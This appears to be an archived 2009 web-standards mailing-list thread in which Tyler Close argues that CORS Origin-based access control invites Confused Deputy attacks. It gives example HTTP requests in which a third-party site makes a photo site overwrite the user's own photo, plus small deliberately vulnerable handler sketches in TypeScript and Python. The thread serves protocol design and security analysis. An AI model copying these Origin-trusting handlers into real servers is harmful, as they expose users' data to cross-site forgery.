https://storage.example.org/photo456, another photo belonging to
photo.example.com. The POST in step 3 now looks like:

POST /copydocument HTTP/1.0
Host: storage.example.org
Origin: photo.example.com
Content-Type: application/json

{
"from" : { "@" : "https://storage.example.org/photo123" },
"to" : { "@" : "https://storage.example.org/photo456" }
}

HTTP/1.0 204 Ok

Consequently, one of the user's existing photos is overwritten with a
different photo.

The general point exemplified by the above scenario is that a site
cannot safely make a request that includes an identifier received from
a third-party, when access-control is based on the origin of a
request. The point of CORS is to enable sites to exchange messages.
These messages will include identifiers. When an identifier is taken
from a response and put into a request, a Confused Deputy
vulnerability is created by CORS. The redirect example is just an
automated way of doing this transfer of an identifier from a response
to a request. CORS could prevent such vulnerabilities by not
identifying the origin of requests.
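
A sketch of why the origin check cannot help the storage server here; the
permission table is an assumption for illustration only.

type Doc = { owner: string; writers: Set<string>; bytes: string };
const docs = new Map<string, Doc>();  // URL -> document record

const canRead = (d: Doc, origin: string) => d.owner === origin;
const canWrite = (d: Doc, origin: string) => d.owner === origin || d.writers.has(origin);

function copyDocument(origin: string, from: string, to: string): boolean {
  const src = docs.get(from);
  const dst = docs.get(to);
  if (!src || !dst) return false;
  if (!canRead(src, origin) || !canWrite(dst, origin)) return false;
  // Both the legitimate request (to = .../job123, writable because the printer
  // granted it) and the attack (to = .../photo456, writable because the origin
  // owns it) pass the same check: the server sees only *who* is asking, never
  // whether the requester meant to name that particular target.
  dst.bytes = src.bytes;
  return true;
}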

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: XHR and sandboxed iframes (was: Re: XHR without user credentials)

2009-06-26 Thread Tyler Close
Response inline below, so keep scrolling...

On Fri, Jun 26, 2009 at 3:41 PM, Ian Hickson i...@hixie.ch wrote:
 On Fri, 26 Jun 2009, Tyler Close wrote:

 Consider two web-applications: photo.example.com, a photo manager; and
 printer.example.net, a photo printer. Both of these web-apps use storage
 provided by storage.example.org. We're going to print a photo stored at:
 https://storage.example.org/photo123

 1. A page from photo.example.com makes request:

     POST /newprintjob HTTP/1.0
     Host: printer.example.net
     Origin: photo.example.com

     HTTP/1.0 201 Created
     Content-Type: application/json

      { "@" : "https://storage.example.org/job123" }

 2. To respond to the above request, the server side code at
 printer.example.net set up a new printer spool file at
 storage.example.org and gave photo.example.com write access to the
 file.

 3. The same page from photo.example.com then makes request:

     POST /copydocument HTTP/1.0
     Host: storage.example.org
     Origin: photo.example.com
     Content-Type: application/json

      {
          "from" : { "@" : "https://storage.example.org/photo123" },
          "to" : { "@" : "https://storage.example.org/job123" }
      }

     HTTP/1.0 204 Ok

 That's the expected scenario. Now, what happens if in step 1,
 printer.example.net responds with URL
 https://storage.example.org/photo456, another photo belonging to
 photo.example.com. The POST in step 3 now looks like:

     POST /copydocument HTTP/1.0
     Host: storage.example.org
     Origin: photo.example.com
     Content-Type: application/json

      {
          "from" : { "@" : "https://storage.example.org/photo123" },
          "to" : { "@" : "https://storage.example.org/photo456" }
      }

     HTTP/1.0 204 Ok

 Consequently, one of the user's existing photos is overwritten with a
 different photo.

 The general point exemplified by the above scenario is that a site
 cannot safely make a request that includes an identifier received from a
 third-party, when access-control is based on the origin of a request.

 I don't understand why photo.example.com would trust the identifier from
 printer.example.net if the latter could be in the same namespace as the
 namespace photo.example.com uses for its own data.

Are you saying the two web-apps should not be allowed to use
storage.example.org?

 The problem there is
 simply one of trusting potentially hostile external input.

What input validation should photo.example.com have done?

Your above claim basically means that a site cannot accept identifiers
from potentially hostile sites. That is true when using the ACL model
(i.e., doing access control based on the origin of a request). I'm
suggesting we not use the ACL model, since it is broken in multi-party
scenarios like CORS.

I leave it as a simple exercise for the reader to redo the above
example using web-keys (http://waterken.sf.net/web-key). The exchanged
messages have exactly the same format and there is no additional input
validation required. That's because the capability model actually
provides access control in multi-party scenarios.
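
For anyone who wants the gist without doing the exercise, here is a rough
sketch of the capability-style check (Python; simplified for illustration,
not the actual Waterken mechanics, and in a real web-key the token rides in
the URL fragment rather than the query string):

import secrets
from urllib.parse import urlparse, parse_qs

DOCUMENTS = {}  # token -> document contents

def mint(contents):
    # An unguessable token is both the name of the document and the
    # permission to use it.
    token = secrets.token_urlsafe(16)
    DOCUMENTS[token] = contents
    return f"https://storage.example.org/doc?s={token}"

def lookup(url):
    token = parse_qs(urlparse(url).query).get("s", [None])[0]
    if token not in DOCUMENTS:
        raise PermissionError("unknown web-key")
    return token

def copy_document(from_url, to_url):
    # Authority comes from possession of the web-keys; the server never
    # consults an Origin header, so there is no deputy to confuse.
    DOCUMENTS[lookup(to_url)] = DOCUMENTS[lookup(from_url)]

photo123 = mint("holiday photo")
job123 = mint("")  # spool file minted by the printer in step 2

copy_document(photo123, job123)

# The printer can only hand back web-keys it actually holds; it cannot name
# photo456 because that token is unguessable, so the overwrite attack from
# the scenario above is simply not expressible.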

 The point of CORS is to enable sites to exchange messages. These
 messages will include identifiers. When an identifier is taken from a
 response and put into a request, a Confused Deputy vulnerability is
 created by CORS. The redirect example is just an automated way of doing
 this transfer of an identifier from a response to a request. CORS could
 prevent such vulnerabilities by not identifying the origin of requests.

 I don't understand why this is any different in sandboxed iframes than
 anywhere else. I don't disagree that redirects complicate matters mildly,
 but that is the case regardless of whether there is a sandboxed iframe or
 not as far as I can tell. My point was that without the user credentials
 in the sandboxed origin, it would be impossible for the page to even get
 to the original photo data, let alone contact the printing site or the
 storage site and get them to print a photo.

There are no sandboxed iframes in this example. It's just a simple web
page from a single origin, using CORS for cross-origin resource
sharing. And it doesn't work. The scenario is not impossible to
implement. It is simple using web-keys. It is only impossible to
safely implement it using the CORS security model.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [cors] TAG request concerning CORS Next Step(s)

2009-06-24 Thread Tyler Close
On Wed, Jun 24, 2009 at 10:16 AM, Jonas Sicking jo...@sicking.cc wrote:
 Firefox 3.5 will be out in a matter of days (RC available already) and
 it supports the majority of CORS (everything but redirects of
 preflighted requests).

What is the behavior of the Origin header on other kinds of redirects?
For example:

1. page from Site A does: POST text/plain to a URL at Site B

2. Site B responds with a redirect to a URL at Site A

3. User clicks through any presented redirect confirmation dialog

4. Browser sends the POST from step 1 to the specified URL at Site A.

What is the value of the Origin header in step 4?

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [cors] TAG request concerning CORS Next Step(s)

2009-06-24 Thread Tyler Close
Hi Jonas,

I'm just asking what Origin header behavior will be shipped in Firefox
3.5. You've said redirects of preflighted requests aren't supported,
so I'm wondering about the non-preflighted requests.

Another question, since Firefox doesn't support redirects of
preflighted requests, what does it do when it encounters a redirect?

--Tyler

On Wed, Jun 24, 2009 at 12:43 PM, Jonas Sicking jo...@sicking.cc wrote:
 On Wed, Jun 24, 2009 at 11:45 AM, Tyler Close tyler.cl...@gmail.com wrote:
 On Wed, Jun 24, 2009 at 10:16 AM, Jonas Sicking jo...@sicking.cc wrote:
 Firefox 3.5 will be out in a matter of days (RC available already) and
 it supports the majority of CORS (everything but redirects of
 preflighted requests).

 What is the behavior of the Origin header on other kinds of redirects?
 For example:

 1. page from Site A does: POST text/plain to a URL at Site B

 2. Site B responds with a redirect to a URL at Site A

 3. User clicks through any presented redirect confirmation dialog

 4. Browser sends the POST from step 1 to the specified URL at Site A.

 What is the value of the Origin header in step 4?

 Which Origin are you referring to here?

 The Origin header defined by the CORS spec is known to be bad and is
 being worked on.  So I'm not sure it's interesting to discuss what the
 CORS spec says here. (At least that was the status last I looked, I'm
 a bit behind on the last few rounds of emails though).

 As for the Origin spec that Adam Barth is working on, I'm not sure
 that the last draft is published yet, but I believe that the idea is
 to append the full redirect chain in the Origin header. (hence
 possibly making it incompatible with the CORS Origin meaning that
 we'll have to use another name).

 So again, we do know there is a problem with the Origin header in the
 CORS spec when it comes to redirects. It's a known outstanding issue
 that we believe is fixable and not a reason to abandon the whole spec.

 / Jonas




-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [cors] TAG request concerning CORS Next Step(s)

2009-06-24 Thread Tyler Close
On Wed, Jun 24, 2009 at 1:37 PM, Jonas Sicking jo...@sicking.cc wrote:
 On Wed, Jun 24, 2009 at 12:52 PM, Tyler Close tyler.cl...@gmail.com wrote:
 Hi Jonas,

 I'm just asking what Origin header behavior will be shipped in Firefox
 3.5. You've said redirects of preflighted requests aren't supported,
 so I'm wondering about the non-preflighted requests.

 It will have the Origin header of the original request. We're
 considering blocking the request entirely for now though.

Meaning the POST request is delivered to Site A, with an Origin header
also identifying Site A, but with a Request-URI chosen by Site B. So
Site B can cause the POST request to be sent to any resource on Site A
and be processed under Site A's authority. I recommend against
shipping that algorithm.

Note that this scenario is just a special case of a more general
problem with the Origin proposal. Whenever a page issues a request
that includes data provided by a third site, that page is applying its
own authority to identifiers provided by the third site. This is the
essence of a CSRF attack (Confused Deputy). For example, if a page
from Site A does a GET to Site B and then includes a received
identifier in a subsequent POST to a site other than Site B, Site A is
vulnerable to a Confused Deputy attack by Site B. Since the whole
point of cross-origin requests is to enable this kind of passing of
information between sites, the Origin proposal is poorly suited for
access-control in these scenarios.
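
As a rough illustration of the receiving end (a sketch only, in Python, with
hypothetical names; not any shipping server code), consider a handler at
Site A that uses Origin as its access-control signal:

# If the browser carries "Origin: site-a.example" across a redirect issued
# by Site B, then Site B chooses the Request-URI while the header still
# vouches for Site A: a confused deputy.
TRUSTED_ORIGIN = "site-a.example"

def handle_post(path, headers, body):
    if headers.get("Origin") != TRUSTED_ORIGIN:
        return 403, "cross-site request refused"
    # Treated as a first-party request: any state-changing endpoint on
    # Site A is now reachable with a path picked by Site B.
    return 200, f"performed state change at {path}"

# Step 4 of the redirect scenario above, as seen by Site A:
print(handle_post(
    "/admin/delete-account",       # Request-URI chosen by Site B's redirect
    {"Origin": "site-a.example"},  # Origin still names Site A
    "text/plain body from step 1",
))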

Again, see my paper "ACLs don't" (http://waterken.sf.net/aclsdont/)
for an in-depth explanation of why ACL model solutions, such as
Origin, can't solve this problem. The section on stack introspection
is especially relevant, as Origin is a degenerate form of stack
introspection.

 Another question, since Firefox doesn't support redirects of
 preflighted requests, what does it do when it encounters a redirect?

 It aborts and denies the original request. For XHR that means raising
 an error event.

It's worth wondering whether web pages will come to rely on these
requests being aborted and so be vulnerable should a future release
not abort the requests.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html


